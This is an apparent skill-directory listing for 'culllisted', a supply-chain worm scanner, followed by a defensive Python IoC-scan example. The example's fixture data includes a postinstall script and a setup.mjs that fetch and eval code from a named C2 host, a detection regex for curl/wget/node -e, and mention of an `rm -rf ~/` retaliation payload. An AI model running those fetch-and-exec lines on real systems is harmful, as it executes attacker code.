← ClaudeAtlas

culllisted

Scans the local machine for supply-chain malware infections via an IoC-based local scan and walks through safe eradication for npm/PyPI worm campaigns (Shai-Hulud, S1ngularity, lottie-player). Detects OS persistence (LaunchAgent/systemd), IDE-hook implants (.claude/.vscode/.github/workflows), lockfile-pinned malicious versions, and C2/exfil traces. Sequences credential rotation so that revocation does not trigger the `rm -rf ~/` retaliation payload. Use when a worm infection is suspected. Not for SAST (Sentinel), skill/MCP audit (Chain), Sigma/YARA (Vigil), or incident coordination (Triage).
simota/agent-skills · ★ 49 · AI & Automation · score 84
Install: claude install-skill simota/agent-skills
CAPABILITIES_SUMMARY:
- ioc_database_match: Match local-filesystem state, process tree, lockfile pins, and git history against a curated IoC database of public supply-chain worm campaigns (Mini Shai-Hulud 1st/2nd, S1ngularity, lottie-player, etc.)
- persistence_sweep: Detect OS-level persistence: macOS LaunchAgent (`~/Library/LaunchAgents/`), Linux systemd user units (`~/.config/systemd/user/`), Windows scheduled tasks, and cross-platform IDE-hook implants (`.claude/settings.json|setup.mjs|router_runtime.js`, `.vscode/tasks.json|setup.mjs`, `.github/workflows/codeql_analysis.yml`)
- lockfile_pin_check: Scan `package-lock.json` / `pnpm-lock.yaml` / `yarn.lock` / `requirements.txt` / `Pipfile.lock` / `Gemfile.lock` for known-bad versions and resolved tarball URLs
- optional_dependencies_audit: Flag `optionalDependencies` referencing `github:<owner>/<repo>#<commit>` orphan commits and `prepare` / `postinstall` lifecycle scripts that fetch and execute remote code
- exfil_trace_match: Detect outbound traces to known C2 hosts (`git-tanstack[.]com`, `api[.]masscan[.]cloud`), Session Protocol seed nodes, and GitHub anomaly patterns (auto-created `{dune_word}-{dune_word}-{3-digit}` repos, `createCommitOnBranch` mutations, `chore: update dependencies` commits from unknown authors)
- safe_eradication_orchestration: Generate an ordered removal runbook: **stop persistence first** (so `gh-token-monitor` cannot fire `rm -rf ~/` on token-revoke detection), then delete dropped files, then
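The npm side of the checks in the capabilities summary (optionalDependencies audit, lockfile pin check, persistence sweep, exfil trace match, and the ordered runbook), as an added Python example that is not the culllisted skill's own code. The C2 hosts, implant paths and `gh-token-monitor` name come from the listing above; the package name `example-pkg`, its "bad" version, the sample manifest, lockfile and connection lines, and the `user-sync.service` unit are constructed so the script runs offline; the remote-exec regex, the "anything not registry.npmjs.org is suspicious" heuristic and the reinstall step of the runbook are assumptions, since the listing names no real bad versions and is cut off after "delete dropped files".

```python
"""Local IoC scan for npm supply-chain worm traces. Added example, not the culllisted
skill's own code. Values tagged (page) come from the listing; (constructed)/(assumed)
values are invented here so the script runs offline."""
from __future__ import annotations
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# (page) C2 / exfil hosts, listed defanged and refanged here for string matching
C2_HOSTS = {h.replace("[.]", ".") for h in ("git-tanstack[.]com", "api[.]masscan[.]cloud")}
# (page) IDE-hook implant paths, relative to a project checkout
IMPLANTS = [".claude/settings.json", ".claude/setup.mjs", ".claude/router_runtime.js",
            ".vscode/tasks.json", ".vscode/setup.mjs", ".github/workflows/codeql_analysis.yml"]
BAD_PINS = {"example-pkg": {"9.9.9"}}  # (constructed) the listing names no real bad versions
REMOTE_EXEC = re.compile(r"curl\s|wget\s|https?://|node\s+-e|Invoke-WebRequest", re.I)  # (assumed)
GITHUB_COMMIT = re.compile(r"^github:[\w.-]+/[\w.-]+#[0-9a-f]{7,40}$")  # (page) git-commit pin

SAMPLE_PACKAGE_JSON = {  # (constructed) victim manifest
    "optionalDependencies": {"example-pkg": "github:someone/example-pkg#0123456789abcdef0123456789abcdef01234567"},
    "scripts": {"postinstall": "node -e \"fetch('https://git-tanstack.com/p').then(r=>r.text()).then(eval)\""},
}
SAMPLE_LOCK = {"lockfileVersion": 3, "packages": {  # (constructed) package-lock v3 shape
    "": {"name": "victim-app"},
    "node_modules/example-pkg": {"version": "9.9.9", "resolved": "https://git-tanstack.com/example-pkg-9.9.9.tgz"},
    "node_modules/left-pad": {"version": "1.3.0", "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz"},
}}
SAMPLE_CONNS = [  # (constructed) `lsof -i` style lines
    "node 4242 user 21u IPv4 TCP 10.0.0.5:51000->api.masscan.cloud:443 (ESTABLISHED)",
    "chrome 77 user 31u IPv4 TCP 10.0.0.5:51001->registry.npmjs.org:443 (ESTABLISHED)",
]

def audit_manifest(pkg: dict) -> list[str]:
    """optional_dependencies_audit: git-commit pins and fetch-and-exec lifecycle hooks."""
    hits = [f"optionalDependencies {n} pinned to git commit {s}"
            for n, s in pkg.get("optionalDependencies", {}).items() if GITHUB_COMMIT.match(s)]
    for hook in ("prepare", "postinstall"):
        cmd = pkg.get("scripts", {}).get(hook, "")
        if REMOTE_EXEC.search(cmd):
            hits.append(f"scripts.{hook} fetches/executes remote code: {cmd}")
    return hits

def check_lockfile(lock: dict) -> list[str]:
    """lockfile_pin_check for package-lock v2/v3: known-bad versions and tarballs resolved off-registry."""
    hits = []
    for key, meta in lock.get("packages", {}).items():
        name = key.rsplit("node_modules/", 1)[-1]  # "" is the root project entry, skip it
        if not name:
            continue
        ver, host = meta.get("version", ""), urlparse(meta.get("resolved", "")).hostname or ""
        if ver in BAD_PINS.get(name, ()):
            hits.append(f"{name}@{ver} is a known-bad pin")
        if host in C2_HOSTS or (host and host != "registry.npmjs.org"):
            hits.append(f"{name} resolved from {'C2' if host in C2_HOSTS else 'non-registry'} host {host}")
    return hits

def sweep_persistence(home: Path, project: Path) -> list[str]:
    """persistence_sweep: IDE-hook drop-ins in the repo, LaunchAgents / systemd user units in $HOME."""
    # settings.json / tasks.json are legitimate in many repos, so they are flagged for review only;
    # the .mjs / .js / workflow drop-ins are the implants themselves
    hits = [f"{'review' if rel.endswith('.json') else 'implant'}: {rel}"
            for rel in IMPLANTS if (project / rel).exists()]
    for d in (home / "Library/LaunchAgents", home / ".config/systemd/user"):
        for f in (d.iterdir() if d.is_dir() else ()):
            body = f.read_text(errors="ignore") if f.is_file() else ""
            if "gh-token-monitor" in body or any(h in body for h in C2_HOSTS):
                hits.append(f"persistence: {f}")
    return hits

def match_exfil(conn_lines: list[str]) -> list[str]:
    """exfil_trace_match over connection / proxy log lines."""
    return [line for line in conn_lines if any(h in line for h in C2_HOSTS)]

def eradication_plan(findings: dict) -> list[str]:
    """safe_eradication_orchestration: persistence is stopped BEFORE anything else, so the
    gh-token-monitor watcher cannot fire `rm -rf ~/` when it sees its token revoked, and
    credential rotation comes last. The reinstall step is assumed; the listing is cut off there."""
    steps = ["stop persistence: `launchctl bootout gui/$UID <plist>` or `systemctl --user disable --now <unit>`,"
             " then kill the watcher process"]
    if findings["persistence"]:
        steps.append("delete dropped files: " + ", ".join(findings["persistence"]))
    if findings["manifest"] or findings["lockfile"]:
        steps.append("(assumed) purge flagged pins and lifecycle scripts, reinstall from a clean lockfile")
    steps.append("rotate npm / GitHub / cloud credentials only now, after the steps above are verified")
    return [f"{i}. {s}" for i, s in enumerate(steps, 1)]

def run_demo() -> dict:
    """Build a throwaway $HOME and project tree (constructed) and run every check against it."""
    root = Path(tempfile.mkdtemp())
    home, project = root / "home", root / "project"
    (project / ".claude").mkdir(parents=True)
    (project / ".claude/setup.mjs").write_text("await (await fetch('https://git-tanstack.com/p')).text();\n")
    units = home / ".config/systemd/user"
    units.mkdir(parents=True)
    (units / "user-sync.service").write_text("[Service]\nExecStart=/usr/bin/node ~/.cache/gh-token-monitor.js\n")
    return {"manifest": audit_manifest(SAMPLE_PACKAGE_JSON), "lockfile": check_lockfile(SAMPLE_LOCK),
            "persistence": sweep_persistence(home, project), "exfil": match_exfil(SAMPLE_CONNS)}

if __name__ == "__main__":
    print("\n".join(eradication_plan(run_demo())))
```

Two caveats when pointing this at a real checkout: the off-registry heuristic in `check_lockfile` will flag every package pulled from a private registry or mirror, so add those hosts to an allowlist before trusting the output, and an existing `.claude/settings.json` or `.vscode/tasks.json` is only a "review" finding until its contents show a fetch-and-exec pattern. The runbook order is the part that matters most: the plan always puts stopping persistence first and credential rotation last, which is the sequencing the listing describes to avoid the `rm -rf ~/` retaliation.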